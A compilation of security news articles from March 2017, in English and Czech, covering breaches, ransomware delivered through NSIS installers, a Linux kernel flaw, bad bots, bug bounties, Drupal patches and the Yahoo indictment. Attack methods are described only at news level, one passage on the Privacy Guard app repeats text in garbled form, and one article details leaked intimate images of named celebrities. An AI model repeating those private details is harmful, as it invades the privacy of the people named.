"Encryption will hardly make a difference to the incident," warns Ilia Kolochenko, CEO of High-Tech Bridge. "Hashed passwords can be quite easily bruteforced, and taking into consideration modern computing capacities, including elastic cloud infrastructure, attackers will probably get the majority of passwords in plaintext without much effort."

The statement also says, "We are not aware of any information being shared beyond the infiltrator." This is another phrase designed to be reassuring but is ultimately meaningless unless the infiltrator is already known and apprehended (which of course is entirely possible). If this was a remote hack, then there is simply no way of knowing what the hacker may have done with the information.

This is particularly relevant to a part of the stolen data. Potentially accessed data includes a "smaller volume of data uploaded via the website by ABTA Members using the 'self-service' facility on abta.com, where ABTA Members have uploaded documentation in support of their membership." We don't know what members may have included in the uploaded supporting documentation, but it is likely to include names, addresses, phone numbers and so on in free text.

While ABTA says the passwords were encrypted, it does not say the documents were encrypted. This data is valuable to identity thieves, and victim members of ABTA will need to monitor their bank accounts and credit scores for years to come. Cyber criminals are well-known to be patient in their use of personal information for criminal purposes. As the ABTA statement says, victims "should remain vigilant regarding online and identity fraud: actively monitor your bank accounts and any social media and email accounts you may have."

In the meantime, victims should immediately change their ABTA password, and change any identical or even similar password used on any other account, to something strong and unique. Organizations, however, need urgently find some way to security audit their supply chain; a necessity that will only become more important as the EU's General Data Protection Regulation comes into force.

Roughly a year ago, Google decided to open source its Vendor Security Assessment Questionnaire (VSAQ) framework to help companies improve their security programs. While not an official product of the search giant, the interactive questionnaire application was developed to support security reviews by facilitating the collection of information and allowing users to display it in a template form.


Attackers Use New NSIS Installers to Hide Ransomware

16.3.2017 securityweek Virus

Newly observed ransomware campaigns are leveraging installer files from the Nullsoft Scriptable Install System (NSIS) to hide malicious code, Microsoft says.

The NSIS installers were recently associated with various well-known ransomware families, including Cerber, Locky, Teerac (also known as Crypt0L0cker), Crowti (aka CryptoWall), Wadhrama, and Critroni (aka CTB-Locker).

The new NSIS installers attempt to evade anti-virus detection by trying to look as normal as possible by incorporating non-malicious components. These include more non-malicious plugins, in addition to the installation engine system.dll; a .bmp file as the background image for the installer interface, and a non-malicious uninstaller component uninst.exe.

Unlike previously used NSIS installers, the new ones no longer feature the randomly named DLL file that was used to decrypt the encrypted malware. Because of this major change, the footprint of malicious code in the NSIS installer package is significantly reduced, Microsoft reveals.

Starting last month, Microsoft observed an uptick in the adoption of the new installers that install ransomware. Instead of using a DLL file to decrypt the malicious payload, the new installers pack a Nullsoft installation script that loads the encrypted data file in memory and executes its code area.

Not only is the malicious payload encrypted, but the installation script is also obfuscated. The script loads the encrypted data file into memory, then gets the offset to the code area (12137). Next, the script issues a call to the encrypted data file. According to Microsoft, the code area in the encrypted data file is the first decryption layer, but the script further decrypts the code until it runs the final payload.

“By constantly updating the contents and function of the installer package, the cybercriminals are hoping to penetrate more computers and install malware by evading antivirus solutions. Given the pervasiveness of NSIS installers that distribute ransomware, they are likely part of a distribution network used by attackers to install their malware,” Andrea Lelli, Microsoft Malware Protection Center, notes.

The distribution campaigns leveraging the new NSIS installers usually follow a specific scheme, Microsoft explains: spam emails that mimic invoice delivery notifications are used to deliver a malicious attachment that could be a JavaScript downloader, a JavaScript downloader in a .zip file, a .LNK file that contains a PowerShell script, or a document with malicious macros. When the intended victim opens the attachment, the NSIS installer is downloaded, which is turn decrypts and runs the malware.

“Cybercriminals will stop at nothing to attempt sidestepping security solutions in order to install malware on your computer. The fact that we’re seeing these innovations in cybercriminal operations that deliver ransomware reveals that they are highly motivated to achieve their ultimate goal: to siphon money off their victims. Unfortunately, for enterprises, the damage of successful malware infection can be so much more than just cash,” Lelli says.


Another Old Flaw Patched in Linux Kernel

16.3.2017 securityweek Vulnerebility
A researcher has identified another potentially serious Linux kernel vulnerability that has been around for several years. The flaw was addressed in the kernel more than one week ago, but some of the affected Linux distributions have yet to release patches.

The security hole was discovered using the syzkaller fuzzer by Positive Technologies expert Alexander Popov, who reported it to Linux kernel developers on February 28. The researcher said the vulnerability was introduced in June 2009.

The flaw, tracked as CVE-2017-2636, is a race condition in the n_hdlc driver that can lead to a double-free error. A local attacker with limited privileges can exploit the weakness to cause a denial-of-service (DoS) condition or escalate privileges.

"The vulnerability is old, so it is widespread across Linux workstations and servers,” explained Popov. “To automatically load the flawed module, an attacker needs only unprivileged user rights. Additionally, the exploit doesn't require any special hardware.”

The security hole affects Red Hat, Ubuntu, Debian, SUSE and other distributions, but patches have not been made available for all affected versions. The bug was patched in the Linux kernel on March 7.

Until fixes become available, users can mitigate the vulnerability by manually blocking the affected module from loading. Popov says he plans on releasing a proof-of-concept (PoC) exploit once users have had the chance to update their installations.

Several of the Linux kernel flaws identified in the past months had been introduced years prior to their discovery, including CVE-2016-0728 and CVE-2016-5696, both introduced in 2012 and both affecting Linux and Android devices. An even older vulnerability, CVE-2017-6074, which came to light last month, was introduced in 2005.

Researcher Kees Cook recently analyzed the Linux kernel vulnerabilities discovered since 2011 in an effort to determine for how long they had gone unnoticed. The expert determined that the average lifespan of a security hole is roughly 5 years, with critical issues being discovered after 3.3 years and high severity bugs found after more than 6 years.


Advanced Persistent "Bad Bots" are Rampant

16.3.2017 securityweek BotNet
In 2016, 40% of all web traffic originated from bots -- and half of that came from bad bots. A bot is simply a software application that runs automated tasks over the internet. Good bots are beneficial. They index web pages for the search engines, can be used to monitor web site health and can perform vulnerability scanning. Bad bots do bad things: they are used for content scraping, comment spamming, click fraud, DDoS attacks and more. And they are everywhere.

Findings from Distil's 2017 Bad Bot Report (PDF) released Thursday show that the problem is rising again after a brief improvement in 2015. In 2015 bad bots represented 18.61% of all web traffic. This is down from 22.78% in 2014, but has risen to 19.90% in 2016. These figures come from an analysis of hundreds of billions of bad bot requests, anonymized over thousands of domains.

Bad Bot Report

Bad bots especially target web sites with proprietary content and/or pricing information, a login section, web forms, and payment processing. Ninety-seven percent of websites with proprietary content and/or pricing are hit by unwanted scraping; 90% of websites were hit by bad bots in 2016 that were behind the login page; and 31% of websites with forms are hit by spam bots.

Sophisticated bots, which Distil describes as "advanced persistent bots" or APBs, can load JavaScript, hold onto cookies, and load external resources. They are persistent, and can even randomize their IP address, headers, and user agents. In 2016, 75% of bad bots were advanced persistent bots, Distil says.

Bots attack the application layer, so the traditional defense has always been the web application firewall (WAFs). It's a good start says Distil, but not enough. WAFs are good at blocking bad IPs, and can geo-block whole regions. While this could block, for example, China and Russia (if the site in question doesn't do business with China and Russia), more than 55% of all bot traffic originates from within the US.

This doesn't mean that the bot operators are mostly American citizens. "Unlike the criminals of yesteryear who needed to be physically present to commit crimes, cyber thieves have technology to do their bidding for them. Sure, a spammer bot might originate from the Microsoft Azure Cloud, but the perpetrator responsible for it could be located anywhere in the world."

While blocking entire counties (Russia and China, for example) may be a feasible defense, bot origination from friendly nations such as The Netherlands (11.4%) is almost twice that of China (6.1%). Blocking individual known bad IPs is also problematic. "Bad bots rotate through IPs, and cycle through user agents to evade these WAF filters," warns Distil.

"You'll need a way to differentiate humans from bad bots using headless browsers, browser automation tools, and man-in-the-browser malware," it adds. "52.05% percent of bad bots load and execute JavaScript -- meaning they have a JavaScript engine installed."

The failure of WAFs to adequately block bad bots has contributed to the increase in application layer DDoS attacks. Volumetric DDoS (itself a rapidly growing problem due to botnets harnessing the power of the internet of things) simply flood the website until further access is impossible. However, this is a Layer 3 that attack that can be easily spotted and, with sufficient planning, mitigated.

"In contrast," notes Distil, "an application denial of service event occurs when bots programmatically abuse the business logic of your website. This happens at layer seven, so you won't notice it on your firewall and your load balancer will be just fine. It's the web application and backend that keels over."

A simple example of this type of attack is found in WordPress websites. A bot adds 'web-admin.php' (it could be anything that waits for further user input) to a legitimate page URL, and then sends repeated access requests while cycling through multiple IPs. This rapidly leads to the consumption of all available channels -- and the site is effectively down.

The threat from bad bots should not be underestimated -- their nuisance value alone can cause problems. Content scraping and reposting elsewhere will lower search engine scores and affect good traffic. They can skew traffic analytics, providing web analytics with false information and potentially leading to false assumptions and misguided future planning.

But many bots have malicious intent from the beginning -- for example, bad bots are one of the primary methods of testing stolen credentials. "In 2016," says the report, "95.8% of websites fell prey to account credential bots on their login page. In other words, if you sample any group of 100 websites that contain a login page, 96 of them will have been attacked in this manner... With billions of stolen login credentials available on the dark web, bad bots are busy testing them against websites all over the globe."

"Massive credential dumps like Ashley Madison and LinkedIn," says Rami Essaid, CEO and co-founder of Distil Networks, "coupled with the increasing sophistication of bad bots, has created a world where bad bots are running rampant on websites with accounts. Website defenders should be worried because once bad bots are behind the login page, they have access to even more sensitive data for scraping and greater opportunity to successfully carry out transaction fraud."

There is no easy solution to the threat from bad bots. Distil recommends several options, such as "geo-fence your website by blocking users from foreign nations where your company doesn't do business"; whitelist current or recent browser versions and block older versions from accessing the site; and consider "creating a whitelist policy for good bots and setting up filters to block all other bots -- doing so blocks up to 25% of bad bots."

Doing nothing is not a realistic option, because "you won't see the next bad bot attack coming even though it's all over your site."


Linux Kernel Gets Patch For Years-Old Serious Vulnerability
16.3.2017 thehackernews Vulnerebility
Another dangerous vulnerability has been discovered in Linux kernel that dates back to 2009 and affects a large number of Linux distros, including Red Hat, Debian, Fedora, OpenSUSE, and Ubuntu.
The latest Linux kernel flaw (CVE-2017-2636), which existed in the Linux kernel for the past seven years, allows a local unprivileged user to gain root privileges on affected systems or cause a denial of service (system crash).
Positive Technologies researcher Alexander Popov discovered a race condition issue in the N_HLDC Linux kernel driver – which is responsible for dealing with High-Level Data Link Control (HDLC) data – that leads to double-free vulnerability.
“Double Free” is one of the most common memory corruption bug that occurs when the application releases same memory location twice by calling the free() function on the same allocated memory.
An unauthenticated attacker may leverage this vulnerability to inject and execute arbitrary code in the security context of currently logged in user.
The vulnerability affects the majority of popular Linux distributions including Red Hat Enterprise Linux 6, 7, Fedora, SUSE, Debian, and Ubuntu.
Since the flaw dates back to June 2009, Linux enterprise servers and devices have been vulnerable for a long time, but according to Positive Technologies, it is hard to say whether this vulnerability has actively been exploited in the wild or not.
"The vulnerability is old, so it is widespread across Linux workstations and servers," says Popov. "To automatically load the flawed module, an attacker needs only unprivileged user rights. Additionally, the exploit doesn't require any special hardware."
The researcher detected the vulnerability during system calls testing with the syzkaller fuzzer, which is a security code auditing software developed by Google.
Popov then reported the flaw to kernel.org on February 28, 2017, along with the exploit prototype, as well as provided the patch to fix the issue.
The vulnerability has already been patched in the Linux kernel, and the security updates along with the vulnerability details were published on March 7.
So, users are encouraged to install the latest security updates as soon as possible, but if unable to apply the patch, the researcher advised blocking the flawed module (n_hdlc) manually to safeguard enterprise as well as home use of the operating system.


Intel Offers Up to $30,000 for Hardware Vulnerabilities

16.3.2017 securityweek  Vulnerebility

Intel has launched its first bug bounty program and the tech giant is prepared to offer up to $30,000 for vulnerabilities found in its products.

The bug bounty program, hosted on the HackerOne platform, covers Intel’s software, firmware and hardware. It does not cover Intel Security (McAfee) products, the company’s web infrastructure, or acquisitions completed less than six months ago. Third-party and open source applications are also not in scope of the program.

Researchers who find critical hardware vulnerabilities can earn a maximum of $30,000. Critical flaws in Intel software and firmware are worth up to $7,500 and $10,000, respectively.

The severity of a vulnerability is determined based on its CVSS 3.0 base score, and adjusted depending on the affected product’s threat model and security objectives.

Intel bug bounty program payouts

“We want to encourage researchers to identify issues and bring them to us directly so that we can take prompt steps to evaluate and correct them, and we want to recognize researchers for the work that they put in when researching a vulnerability,” Intel said.

Following the recent Vault 7 leak by WikiLeaks, which describes the CIA’s alleged hacking capabilities, Intel announced the availability of a CHIPSEC framework module that can be used to verify the integrity of EFI firmware executables.

Microsoft launches new Office bug bounty program

Microsoft also made a bug bounty announcement on Wednesday. The company has launched a new program for Office Insider Builds on Windows.

This new bug bounty program, which runs between March 15 and June 15, promises payouts ranging from $6,000 to $15,000 for various types of vulnerabilities. Researchers can earn rewards if they find privilege escalation vulnerabilities via Office Protected View, flaws that allow macro execution by bypassing security policies, and code execution through a bypass of automatic attachment blocking policies in Outlook.

The announcement comes shortly after Microsoft decided to temporarily double bug bounty payouts for vulnerabilities found in core applications of the Office 365 suite.


Several Vulnerabilities Patched in Drupal 8

16.3.2017 securityweek  Vulnerebility

Several vulnerabilities have been patched in the Drupal content management system (CMS) with the release of version 8.2.7, including access bypass, cross-site request forgery (CSRF) and remote code execution flaws.

The most serious of them, rated critical and tracked as CVE-2017-6377, is an access bypass weakness affecting the editor module.

“When adding a private file via a configured text editor (like CKEditor), the editor will not correctly check access for the file being attached, resulting in an access bypass,” Drupal said in its security advisory.

The CSRF flaw, identified as CVE-2017-6379 and rated moderately critical, can be exploited to disable some blocks on a website, but the attacker needs to know the targeted block’s ID. The security hole is caused by the lack of CSRF protection on some administrative paths.

The remote code execution vulnerability, CVE-2017-6381, which has also been rated moderately critical, affects a third-party development library. The flaw, related to development dependencies, is mitigated by the fact that Composer dependencies are typically not installed, and by the default PHP execution protection in .htaccess.

Drupal 8.2.7 includes a security update for phpunit development dependencies. This version ensures that Drupal core requires the most secure version of phpunit available. Using development dependencies in production is not recommended.

Drupal also announced this week that it has found a way to make it easier for users to update the CMS, including from one major version to the next (e.g. from Drupal 8 to the future Drupal 9).

While Drupal is not as targeted as WordPress or Joomla, security firms have seen attacks aimed at websites powered by this CMS. In its latest hacked website report, Sucuri said many of the Drupal websites compromised last year had been running outdated versions.

In September, the SANS Institute’s Internet Storm Center reported seeing attempts to exploit a highly critical vulnerability that had been patched two months earlier.


Drupal version 8.2.7 address multiple vulnerabilities in the current version of the popular CMS
16.3.2017 securityaffairs Vulnerebility

Drupal development team has issued a new release of the popular content management system (CMS), Drupal version 8.2.7, that fixes multiple vulnerabilities.
The Drupal development team has released the Drupal version 8.2.7 that addressed a number of vulnerabilities in the popular CMS. The list of flaws includes an access bypass issue, a cross-site request forgery (CSRF) vulnerability, and a remote code execution flaw.

An access bypass flaw, tracked as CVE-2017-6377, affecting the editor module is considered the most severe vulnerability

“When adding a private file via a configured text editor (like CKEditor), the editor will not correctly check access for the file being attached, resulting in an access bypass,” reads the description provided in the security advisory by Drupal.

Another moderately critical vulnerability is a CSRF flaw tracked as CVE-2017-6379, it is related to the lack of CSRF protection for some administrative paths. An attacker can exploit the issue to disable some blocks of a website by knowing their block ID.

Going on in the list, we find also a remote code execution vulnerability, CVE-2017-6381, which has also been rated moderately critical. The RCE flaw CVE-2017-6381 affects a third-party development library and is related to development dependencies.

The good news is that Drupal Composer dependencies are typically not installed, and by the default PHP execution protection in .htaccess.

In order to improve the security of the Drupal installs, the last release Drupal 8.2.7 includes a security update for phpunit development dependencies. Basically, the Drupal core in the new release requires the most secure version of phpunit available.

It is essential to update the Drupal version, CMS are privileged targets of hackers that try to exploit known vulnerabilities using exploit codes available online.

Outdated versions expose websites that its users to the risk of cyber attacks.

In September, the researchers at the SANS Institute’s Internet Storm Center reported seeing attempts to exploit a highly critical vulnerability in a third-party Drupal module, the RESTful Web Services (RESTWS) module.


Privacy Guard – Let’s evaluate privacy risks caused by the apps installed on our device
16.3.2017 securityaffairs Safety

Privacy Guard is an Android app that evaluates the risks of data privacy relying on the permissions requested by the apps installed on a device.
Mobile devices collect a large volume of personal information that could be used for malicious purposes by adversaries. In order to increase the awareness of user towards the possibility of data leakage and the importance of protecting personal data stored in smartphones, we developed: ‘Privacy Guard‘.

Privacy Guard is an Android app that evaluates the risks of data privacy relying on the permissions requested by the apps installed on a device.

Privacy Guard was developed at Iswatlab (http://www.iswatlab.eu/?page_id=499), the cyber security lab of the Department of Engineering of the University of Sannio (Italy), from an idea of and under the supervision of Corrado Aaron Visaggio, which is the responsible of the lab and: Antonio Altieri, Fabrizio Giorgione, Alfredo Nazzaro, and Assunta Oropallo.

On the basis of our studies on malicious apps that exfiltrate sensitive data (http://www.iswatlab.eu/?p=461), we found out that both trusted apps and malicious apps take a lot of sensitive data. Such data can be then used for different purposes that produce revenue for the adversary who obtained it: to sell user’s profile to a third party for marketing purposes, to feed OSINT platforms, to realize identity thefts or for accomplishing frauds and scams.

The point is that the user grants those permissions which allow the data exfiltration when installs the application on the device. The core problem is that the common user ignores completely the kind of permissions that are granted, and, what is more severe, ignores which risk a certain combination of permissions exposes her privacy too.

If an app requires the permission to send SMS and the permission to read contacts, SMS, and some other personal identifiable information stored in the device, it exposes the user to the possibility that the app sends that sensitive information to a third party by SMS.

Relying on such observations, we created a model that identifies which apps have the most dangerous combination of permssions for data privacy.

It is important to remark that Privacy Guard does not evaluate if a data exfiltration happens on a device, but it just identifies those apps which require a combination of permissions that can be strong indicators of activities that affect data privacy preservation.

Privacy Guard is intended to first monitor the potential risks for a user’s data privacy and, as second aim, to stimulate and increase the awareness of user towards the kind of apps she installs on her device, from a security perspective.

Let’s now look at how Privacy Guard works.

Permissions have been grouped into categories and each permission has been assigned a score, ranging from 1 to 10, to describe its dangerousness.

The permissions have been divided into four categories:

Hardware permissions: every permission which requests a direct access to a hardware device;
Data access permissions: every permission which requests a direct access to data stored on the devices;
Communication permissions: every permission which gives the chance to send information either over a network or to another device.
System permissions: every permission which can be requested only by system applications.
To compute a value representing applications’ data leakage capabilities the followed formula has been developed:

(1) (Hn*Wh +Dn * Wd) * MAX(C)

Hn : the normalized sum of hardware permissions’ score requested by an application;
Dn: the normalized sum of data permissions’ score requested by an application;
MAX(C): the maximum value among the communication permissions requested by an application;
Wh: weight assigned to hardware permissions. After empirical considerations, it has been assigned the value 3;
Wd: weight assigned to data permissions. After empirical considerations, it has been assigned the value 7.
However, (1) to represent data leakage capabilities of applications is not enough: some permissions are far more dangerous if used in combination with other permissions. In order to take this into account, the hardware and data access categories have been divided into sub-categories:

Network access Data Acquisition

Change hardware configuration Personal data access

Non-combinable

The communication permissions have been divided considering range and bandwidth. Every combination of this subcategories was considered, assigning a score, ranging from 1 to 10, to each combination. These values act as a penalty to the base score.range and bandwidth. Every combination of this subcategories was considered, assigning a score, ranging from 1 to 10, to each combination. These values act as a penalty to the base score.range and bandwidth. Every combination of .range and bandwidth. Every combination of this subcategories was considered, assigning a score, ranging from 1 to 10, to each combination. These values act as a penalty to the base score.

First of all the application shows a message to synthesize the results and the list of all the applications with the related data leakage score, while if there are one or more applications that exceed a certain threshold, at the top of screen will be shown a message that indicates the number of applications that exceed this value.

Privacy Guard

It’s possible to explore the details of each app. Privacy Guard shows the list of all the activated permissions with a brief description. If one application requires a permission particularly suspect, the application shows a warning to explain at the user how that permission can be used for malicious purposes.

Privacy Guard

It’s possible to explore the details of each app. Privacy Guard shows the list of all the activated permissions with a brief description. If one application requires a permission particularly suspect, the application shows a warning to explain at the user how that permission can be used for malicious purposes.

It’s possible to conduct the analysis only on the user’s application or including all the system’s applications. Privacy Guard is available on the in the Play Store at the following address

https://play.google.com/store/apps/details?id=com.ssr.privacyguard.


S nebezpečnými chybami se roztrhl pytel. Záplatuje Microsoft, Adobe i VMware

16.3.2017 Novinky/Bezpečnost Zranitelnosti
Velkou pozornost by v tomto týdnu měli věnovat uživatelé počítačů bezpečnostním aktualizacím. Opravy nebezpečných trhlin totiž vydalo hned několik velkých společností – například Microsoft, Adobe a VMware.
Jako první vydala v úterý aktualizace hned pro několik svých produktů společnost Microsoft. Její pracovníci museli řešit chyby v samotném operačním systému Windows, stejně jako v kancelářském balíku Office i webových prohlížečích Edge a Internet Explorer.

Hned několik trhlin přitom dostalo nálepku „kritická“. To jinými slovy znamená, že tyto chyby představují pro uživatele nejvyšší možné nebezpečí.

Kritické chyby mohou počítačoví piráti zneužít k tomu, aby do počítače propašovali prakticky libovolný škodlivý kód. Stejně tak ale mohou přistupovat k nastavení napadeného stroje či uloženým datům na pevném disku.

Další zranitelnosti, které byly objeveny v aplikacích amerického softwarového gigantu, mají nálepku „důležité“. Ty slouží především ke zlepšení funkčnosti samotného systému, ale například také kancelářského balíku Office. Důležité záplaty by neměly pro uživatele představovat žádné velké bezpečnostní riziko.

Microsoft není jediný
Kritické zranitelnosti ve svých produktech ohlásila také společnost Adobe. Konkrétně se jedná o populární program Flash Player, který slouží k přehrávání videí na internetu a po celém světě jej používají stovky miliónů lidí, a o aplikaci Shockwave Player.

I tyto nebezpečné trhliny mohou počítačoví piráti zneužít k získání kontroly nad napadeným systémem.

A v podstatě totéž platí také pro virtualizační software Workstation a Fusion od společnosti VMWare. Také v případě těchto programů museli tvůrci vydat opravy, které zamezí záškodníkům v přístupu do operačního systému.

S instalací neotálet
S ohledem na možná rizika doporučují bezpečnostní experti s instalacemi opravných balíčků neotálet. „Doporučujeme aktualizovat co nejdříve,“ prohlásil Pavel Bašta, bezpečnostní analytik Národního bezpečnostního týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

Stahovat aktualizace je u programů všech dotčených společností možné prostřednictvím automatických updatů. V případě, že uživatelé nemají nastavenou automatickou instalaci aktualizací, mohou opravy stáhnout přímo ze stránek jednotlivých výrobců.


Kreml dává od útoku na Yahoo ruce pryč

16.3.2017 Novinky/Bezpečnost BigBrother
Kreml ve čtvrtek vyloučil jakoukoli účast ruských tajných služeb na nezákonné kybernetické akci. Mluvčí prezidenta Vladimira Putina Dmitrij Peskov to řekl v reakci na obvinění dvou ruských špionů a dvou dalších osob ministerstvem spravedlnosti USA z útoku na internetovou společnost Yahoo před třemi lety.
Peskov novinářům sdělil, že zatím nemá žádné oficiální informace o tomto obvinění a že vše, co o tom dosud ví, se dozvěděl ze sdělovacích prostředků.

"Opakovaně jsme řekli, že nemůže být řeči o nějakém zapojení některého ruského úřadu, včetně FSB (Federální bezpečnostní služby), do jakýchkoli nezákonných počítačových aktivit," zdůraznil Peskov.

Americké ministerstvo spravedlnosti ve středu oznámilo, že obvinilo dva ruské špiony a dva hackery původem z bývalých sovětských republik v souvislosti s ukradením dat z účtů internetové společnosti Yahoo z roku 2014.

Podle deníku The Washington Post jde o vůbec první obvinění svého druhu "ruských vládních činitelů". Týká se dvou pracovníků ruské tajné služby FSB a dvou hackerů, které si Rusové údajně najali.

Více než miliarda přihlašovacích údajů
Loni v září vedení Yahoo oznámilo, že v roce 2014 byla z jeho serverů odcizena data z 500 miliónů účtů. V prosinci pak zástupci Yahoo potvrdili, že při dalším útoku z roku 2013 byla odcizena více než miliarda přihlašovacích údajů. 

Yahoo dosud neuvedla, zda oba útoky souvisely. Útoky také měly dopad na prodej hlavního podnikání Yahoo komunikačnímu gigantovi Verizon. 

Odcizené informace mohou podle vyjádření podniku zahrnovat jména, e-mailové adresy, telefonní čísla, data narození a takzvané ověřovací otázky a odpovědi na ně.

Služby Yahoo využívá podle serveru expandedramblings.com každý měsíc miliarda lidí. E-mailovou schránku má na tomto serveru 280 miliónů lidí, z toho 81 miliónů jich je z USA.


Spojené státy obvinily dva ruské špióny kvůli hackerskému útoku na Yahoo

16.3.2017 Novinky/Bezpečnost BigBrother
Americké ministerstvo spravedlnosti obvinilo dva agenty ruské tajné služby FSB a dva jimi najaté hackery v souvislosti s útokem na server internetové firmy Yahoo ze září 2014. Při něm byly získány údaje o půl miliardě uživatelů. List The Washington Post připomněl, že je to poprvé, kdy USA obvinily z kybernetického útoku představitele Ruska. Ministerstvo se rozhodlo pro tento krok, aby ukázalo hackerům, že takovéto útoky bude přísně stíhat.
Oznámení přišlo poté, co byl v úterý v Kanadě zadržen v Kazachstánu narozený Karim Baratov, který měl kanadské občanství. Je jedním z najatých hackerů. Druhým je Alexej Balan, který patřil k nejúspěšnějším hackerům a čelí už dvěma starším obviněním kvůli útokům na nevadské a kalifornské technologické firmy z let 2012 a 2013. Byl ve vazbě v Řecku, ale vrátil se do Ruska.

Mary McCordová z ministerstva spravedlnosti hovoří před plakáty s podezřelými agenty FSB

Obviněnými agenty FSB jsou Dmitrij Dokučajev a jeho nadřízený Igor Susčin. Dokučajev ale byl podle agentury Interfax loni zatčen v Moskvě kvůli obvinění z vlastizrady, neboť údajně předával informace CIA. S FSB se rozhodl spolupracovat, aby unikl stíhání za podvod s bankovní kartou.

Obvinění byla výsledkem dva roky dlouhého vyšetřování sanfranciské pobočky FBI.

Zástupci amerického ministerstva spravedlnosti instalují plakát se vyhlášeným pátráním po Igoru Šuščinovi
Zástupci amerického ministerstva spravedlnosti instalují plakát se vyhlášeným pátráním po Igoru Šuščinovi
FOTO: Yuri Gripas, Reuters

Při útoku se FSB pokoušela získat informace ze zpravodajských důvodů, zaměřovala se novináře, disidenty a americké vládní představitele. Hackerům umožnili využít útoku pro své obohacení

Obvinění se se týká hackerského útoku, podvodu na síti, ukradení tajných dat a hospodářské špionáže.

Útok na Yahoo měl být součástí širšího kybernetického útoku na Spojené státy. Hackeři jednali podle sdělení ministerstva spravedlnosti na základě příkazů ruských agentů. Podle FBI se jednalo o jedny z největších kybernetických zločinců a závažnost činu zvyšuje to, že do něj byla zapojena FSB.

FBI hledá v souvislosti s hackerským útokem i agenta FSB Dmitrije Dokučajeva
FBI hledá v souvislosti s hackerským útokem i agenta FSB Dmitrije Dokučajeva
FOTO: Yuri Gripas, Reuters

Obvinění ale v případě agentů FSB zřejmě vyzní do prázdna, protože obě země nemají uzavřenou dohodu o vzájemném vydávání lidí podezřelých z páchání trestných činů, upozornil list The Washington Post. Podle amerických představitelů ale bude obvinění a sankce působit odstrašujícím účinkem. Navíc, občas stíhaní lidé vyjíždějí do zemí, kde mohou být dopadeni.

Ukradená miliarda účtů
Loni v září firma oznámila, že v roce 2014 byla z jeho serverů odcizena data z 500 miliónů účtů. V prosinci pak zástupci Yahoo potvrdili, že při dalším útoku z roku 2013, jenž byl vůbec největší v historii, byla odcizena více než miliarda přihlašovacích údajů.  Yahoo dosud neuvedla, zda oba útoky souvisely. Útoky také měly dopad na prodej hlavního podnikání Yahoo komunikačnímu gigantovi Verizon. 

Odcizené informace mohou podle vyjádření podniku zahrnovat jména, e-mailové adresy, telefonní čísla, data narození a takzvané ověřovací otázky a odpovědi na ně.

Služby Yahoo využívá podle serveru expandedramblings.com každý měsíc miliarda lidí. E-mailovou schránku má na tomto serveru 280 miliónů lidí, z toho 81 miliónů jich je z USA.

List The Washington Post upozornil, že se tento útok nevztahoval k hackerskému útoku na Demokratickou stranu ani možného vměšování Ruska do loňských prezidentských voleb, zdůraznil deník.


Za obrovským únikem dat z Yahoo nejspíše stál klasický phishing
16.3.2017 Živě.cz Phishing

Sanfranciský soud zveřejnil žalobu (PDF) na dva údajné agenty ruské FSB a dvojici hackerů, kteří měli stát za útoky na Yahoo, kvůli kterým z americké webové služby unikly miliony uživatelských účtů.
Yahoo oznámilo rekordní únik dat - hackeři mají údaje více než miliardy uživatelů
Jak se zdá, do nitra Yahoo se nejspíše nedostali nějakými technicky sofistikovanými zadními vrátky, ale dle FBI nejspíše pomocí phishingu. To znamená, že nějakým způsobem přesvědčili klíčového administrátora, aby jim nevědomky předal přístup do systému.
Šéfka Yahoo dostane zlatý padák v hodnotě „jen“ 23 milionů dolarů
Opět se tedy ukazuje, že ačkoliv může mít provozovatel sebelepší zabezpečení proti klasickým útokům, nakonec se může vše zhroutit třeba kvůli falešnému e-mailu odpovědné osobě, která má dostatek práv.

Yahoo na sklonku loňského roku a po několikaměsíčním vyšetřování přiznalo, že z jeho serverů kdosi neoprávněně získal údaje o půlmiliardě uživatelů. FBI poté označila za viníky právě ruské agenty.


It's Fappening Again! Private Photos of Emma Watson and Others Leaked Online
16.3.2017 thehackernews Incindent


Are you clicking nude selfies? That is fine and not any criminal act, but this act can land you in trouble — here's how!
Almost three years after a wave of private photographs of celebrities leaked online, "The Fappening 2.0" appears to be underway with the circulation of alleged naked pictures of female celebrities, including Emma Watson and Amanda Seyfried on Reddit and 4chan.
Back in 2014, anonymous hackers flooded the Internet with private photographs of major celebrities, including Jennifer Lawrence, Kim Kardashian, Kate Upton and Kirsten Dunst by hacking thousands of Apple's iCloud accounts.
The Fappening hackers have since been sent to prison.
The Fappening 2.0: It's Happening Again!
However, in the latest leak, which has been heralded online as "The Fappening 2.0," the personal photographs of Amanda Seyfried and Emma Watson — ranging from regular selfies to explicitly sexual photos — have been leaking online since Tuesday night.
According to a screenshot from an original 4chan thread, unknown hackers will be posting more intimate photos of female celebrities, including Kylie Jenner, Marisa Tomei, Jennifer Lawrence and several others, over the next few days, which indicates it's just the beginning of The Fappening 2.0.
The affected celebrities did not immediately comment on the invasion of any privacy on their side, but the photographs appear to be authentic.
A representative for Watson has also confirmed that she is taking legal action against the latest leak and that some of the images circulating online are legitimate, saying:
"Photos from a clothes fitting Emma had with a stylist a couple of years ago have been stolen. They are not nude photographs. Lawyers have been instructed and we are not commenting further."
While, leaked images of Watson show the actor posing in various swimsuits and outfits in front of a mirror, the alleged photos of actors Amanda Seyfried and Jillian Murray are much more explicit, appearing to show the stars nude and, in some images, engaging in sexual activity.
There are also pictures and videos that the leaker claims to be of Watson filming herself naked in the bathtub, while another showing her masturbating. But since the face of the woman in the shots can not be seen, this can't be confirmed.
There is yet no information on the source of the leaks or how the personal photos of celebrities were obtained, but the anonymous hackers are claiming that these leaks are just the tip of an iceberg and they're about to release the next batch of celebrities to get their photos leaked.
The most famous celebrities in the list of next wave of private photographs of celebrities appear to be Marisa Tomei, Kylie Jenner, and Jennifer Lawrence.
How To Keep Your Private Photos Private
The Fappening 2.0: Best way to keep your nude selfies off the Internet — Just don't click them!
CLICK TO TWEET
If you are looking for the best way to keep your photos off the Internet, the simplest solution to this is — Don't click them. But if you do so, there are a few steps that you can follow to minimize the risk:
Do not click on any suspicious links or attachments in the email you received.
When in doubt, contact the sender to confirm that he or she actually sent the email to you or not.
Never provide your personal or financial information through an email to anyone.
No service, be it Google, Apple, or Microsoft, ever asks for your password or any other sensitive personal information over an email.
It's always a good idea to regularly update your passwords and security questions.
Enable two-factor authentication on your accounts and always choose a strong and different password for all your accounts. If you are unable to create and remember different passwords for each site, you can use a good password manager.


Pwn2Own 2017: Experts Hack Edge, Safari, Ubuntu

16.3.2017 securityweek Congress

